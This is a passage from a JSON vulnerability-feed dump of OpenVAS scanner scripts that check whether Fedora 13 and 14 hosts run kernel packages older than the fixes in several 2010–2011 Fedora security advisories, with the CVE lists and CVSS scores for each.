License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059860.html\");\n script_id(863087);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-6541\");\n script_cve_id(\"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-1478\", \"CVE-2011-1079\");\n script_name(\"Fedora Update for kernel FEDORA-2011-6541\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.13~91.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-02-11T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-1138", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-4649", "CVE-2010-2963", "CVE-2011-0006", "CVE-2010-3698", "CVE-2010-4648", "CVE-2010-3880", "CVE-2010-2962"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310862842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862842", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-1138\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053901.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862842\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-11 13:26:17 +0100 (Fri, 11 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-1138\");\n script_cve_id(\"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4163\");\n script_name(\"Fedora Update for kernel FEDORA-2011-1138\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.11~83.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:45", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-02-11T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-1138", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-4649", "CVE-2010-2963", "CVE-2011-0006", "CVE-2010-3698", "CVE-2010-4648", "CVE-2010-3880", "CVE-2010-2962"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:862842", "href": "http://plugins.openvas.org/nasl.php?oid=862842", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-1138\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053901.html\");\n script_id(862842);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-11 13:26:17 +0100 (Fri, 11 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-1138\");\n script_cve_id(\"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4163\");\n script_name(\"Fedora Update for kernel FEDORA-2011-1138\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.11~83.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:20", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18506", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-2071", "CVE-2010-4248", "CVE-2010-2954", "CVE-2010-3880", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-4077", "CVE-2010-4075", "CVE-2010-3301"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:1361412562310862713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051902.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862713\");\n script_version(\"$Revision: 8254 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 08:29:05 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18506\");\n script_cve_id(\"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2010-4077\", \"CVE-2010-4075\", \"CVE-2010-4248\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18506\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.7~63.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:36", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-23T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18506", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-2071", "CVE-2010-4248", "CVE-2010-2954", "CVE-2010-3880", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-4077", "CVE-2010-4075", "CVE-2010-3301"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:862713", "href": "http://plugins.openvas.org/nasl.php?oid=862713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051902.html\");\n script_id(862713);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-23 07:38:58 +0100 (Thu, 23 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18506\");\n script_cve_id(\"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2010-4077\", \"CVE-2010-4075\", \"CVE-2010-4248\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18506\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.7~63.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-11103", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-1598", "CVE-2010-2963", "CVE-2011-2699", "CVE-2011-2484", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2010-3880", "CVE-2011-2905", "CVE-2011-1748", "CVE-2011-2213", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-2183"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-11103\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064393.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863447\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-27 16:37:49 +0200 (Sat, 27 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-11103\");\n script_cve_id(\"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-1598\", \"CVE-2011-1748\", \"CVE-2011-2213\", \"CVE-2011-2484\", \"CVE-2011-2183\");\n script_name(\"Fedora Update for kernel FEDORA-2011-11103\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~95.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:57", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-11103", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-1598", "CVE-2010-2963", "CVE-2011-2699", "CVE-2011-2484", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2010-3880", "CVE-2011-2905", "CVE-2011-1748", "CVE-2011-2213", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-2183"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863447", "href": "http://plugins.openvas.org/nasl.php?oid=863447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-11103\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064393.html\");\n script_id(863447);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-27 16:37:49 +0200 (Sat, 27 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-11103\");\n script_cve_id(\"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-1598\", \"CVE-2011-1748\", \"CVE-2011-2213\", \"CVE-2011-2484\", \"CVE-2011-2183\");\n script_name(\"Fedora Update for kernel FEDORA-2011-11103\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~95.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-08-01T16:18:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-12874", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-2905", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-3191"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-12874\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 